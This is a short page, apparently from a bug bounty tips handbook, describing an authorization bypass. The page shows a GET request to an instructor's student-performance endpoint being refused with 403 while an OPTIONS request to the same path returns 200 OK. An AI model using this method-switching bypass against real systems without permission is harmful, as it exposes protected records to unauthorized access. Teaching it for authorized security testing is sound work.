Book of BugBounty Tips
Search...
Ctrl
K
Authentication / Authorization
Previous
Local / Remote File Inclusion
Next
Account Takeover
Last updated
3 years ago
How to bypass access authorization authentication using the OPTIONS method
GET /instructor/performance/students/?course_id=497558 HTTP/1.1 : 403 Forbidden
OPTIONS /instructor/performance/students/?course_id=497558 HTTP/1.1 : 200 OK